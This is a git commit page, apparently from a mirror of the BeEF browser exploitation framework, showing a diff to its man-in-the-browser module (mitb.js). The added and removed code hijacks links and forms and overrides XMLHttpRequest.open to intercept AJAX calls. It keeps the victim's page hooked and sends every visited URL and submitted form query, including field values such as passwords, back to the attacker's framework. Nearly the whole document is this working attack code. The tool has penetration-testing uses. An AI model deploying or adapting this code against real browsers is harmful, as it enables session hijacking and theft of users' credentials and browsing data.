Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added support to intercept dynamic requests

Browse Source
This commit is contained in:
radoen
2012-03-09 16:10:04 +01:00
committed by antisnatchor
parent f2401d3f39
commit a0c11fa695
1 changed files with 195 additions and 118 deletions
Download Patch File Download Diff File Expand all files Collapse all files

313
core/main/client/mitb.js
View File

@@ -15,121 +15,198 @@
//
beef.mitb = {
cid: null,
curl: null,
init: function(cid, curl){
beef.mitb.cid = cid;
beef.mitb.curl = curl;
},
// Initializes the hook on anchors and forms.
hook: function(){
beef.onpopstate.push(function(event) {beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);});
beef.onclose.push(function(event) {beef.mitb.endSession();});
var anchors = document.getElementsByTagName("a");
var forms = document.getElementsByTagName("form");
for(var i=0;i<anchors.length;i++){
anchors[i].onclick = beef.mitb.poisonAnchor;
}
for(var i=0;i<forms.length;i++){
beef.mitb.poisonForm(forms[i]);
}
},
// Hooks anchors and prevents them from linking away
poisonAnchor: function(e){
try{
e.preventDefault;
if(beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])){
var title = "";
if(document.getElementsByTagName("title").length == 0){
title = document.title;
}else{
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be: "EF" }, title, e.currentTarget);
}
}catch(e){
console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
}
return false;
},
// Hooks forms and prevents them from linking away
poisonForm: function(form){
form.onsubmit=function(e){
var inputs = form.getElementsByTagName("input");
var query = "";
for(var i=0;i<inputs.length;i++){
if(i>0 && i<inputs.length-1) query += "&";
switch(inputs[i].type){
case "submit":
break;
default:
query += inputs[i].name + "=" + inputs[i].value;
break;
}
}
e.preventdefault;
beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
history.pushState({ Be: "EF" }, "", form.action);
return false;
}
},
// Fetches a hooked form with AJAX
fetchForm: function(url, query, target){
try{
var y = new XMLHttpRequest();
y.open('POST', url, false);
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function(){
if(y.readyState == 4 && y.responseText != ""){
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(query);
beef.mitb.sniff("POST: "+url+" ["+query+"]");
return true;
}catch(x){
return false;
}
},
// Fetches a hooked link with AJAX
fetch: function(url, target){
try{
var y = new XMLHttpRequest();
y.open('GET', url,false);
y.onreadystatechange = function(){
if(y.readyState == 4 && y.responseText != ""){
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: "+url);
return true;
}catch(x){
window.open(url);
beef.mitb.sniff("GET [New Window]: "+url);
return false;
}
},
// Relays an entry to the framework
sniff: function(result){
try{
beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
}catch(x){}
return true;
},
// Signals the Framework that the user has lost the hook
endSession: function(){
beef.mitb.sniff("Window closed.");
}
}
cid:null,
curl:null,
init:function (cid, curl) {
beef.mitb.cid = cid;
beef.mitb.curl = curl;
/*Override open method to intercept ajax request*/
var xml_type;
if (window.XMLHttpRequest && !(window.ActiveXObject)) {
xml_type = 'XMLHttpRequest';
}
if (xml_type == "XMLHttpRequest") {
beef.mitb.sniff("Method XMLHttpRequest.open override");
(function (open) {
XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
var portRegex = new RegExp(":[0-9]+");
var portR = portRegex.exec(url);
/*return :port*/
var requestPort;
if (portR != null) {
requestPort = portR[0].split(":");
}
if ((user == "beef") && (pass == "beef")) {
/*a poisoned something*/
open.call(this, method, url, async, null, null);
}
else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
/*a beef hook.js polling or dh */
open.call(this, method, url, async, null, null);
}
else {
if (method == "GET") {
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url);
}
else {
beef.mitb.sniff("GET [Ajax Request]: " + url);
if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
/*write the url of the page*/
history.pushState({ Be:"EF" }, title, url);
}
}
}
else {
/*if we are here we have an ajax post req*/
beef.mitb.sniff("Post ajax request to: " + url);
open.call(this, method, url, async, user, pass);
}
}
};
})(XMLHttpRequest.prototype.open);
}
},
// Initializes the hook on anchors and forms.
hook:function () {
beef.onpopstate.push(function (event) {
beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
});
beef.onclose.push(function (event) {
beef.mitb.endSession();
});
var anchors = document.getElementsByTagName("a");
var forms = document.getElementsByTagName("form");
for (var i = 0; i < anchors.length; i++) {
anchors[i].onclick = beef.mitb.poisonAnchor;
}
for (var i = 0; i < forms.length; i++) {
beef.mitb.poisonForm(forms[i]);
}
},
// Hooks anchors and prevents them from linking away
poisonAnchor:function (e) {
try {
e.preventDefault;
if (beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be:"EF" }, title, e.currentTarget);
}
} catch (e) {
console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
}
return false;
},
// Hooks forms and prevents them from linking away
poisonForm:function (form) {
form.onsubmit = function (e) {
var inputs = form.getElementsByTagName("input");
var query = "";
for (var i = 0; i < inputs.length; i++) {
if (i > 0 && i < inputs.length - 1) query += "&";
switch (inputs[i].type) {
case "submit":
break;
default:
query += inputs[i].name + "=" + inputs[i].value;
break;
}
}
e.preventdefault;
beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
history.pushState({ Be:"EF" }, "", form.action);
return false;
}
},
// Fetches a hooked form with AJAX
fetchForm:function (url, query, target) {
try {
var y = new XMLHttpRequest();
y.open('POST', url, false, "beef", "beef");
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(query);
beef.mitb.sniff("POST: " + url + " [" + query + "]");
return true;
} catch (x) {
return false;
}
},
// Fetches a hooked link with AJAX
fetch:function (url, target) {
try {
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: " + url);
return true;
} catch (x) {
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
return false;
}
},
// Relays an entry to the framework
sniff:function (result) {
try {
beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
} catch (x) {
}
return true;
},
// Signals the Framework that the user has lost the hook
endSession:function () {
beef.mitb.sniff("Window closed.");
}
}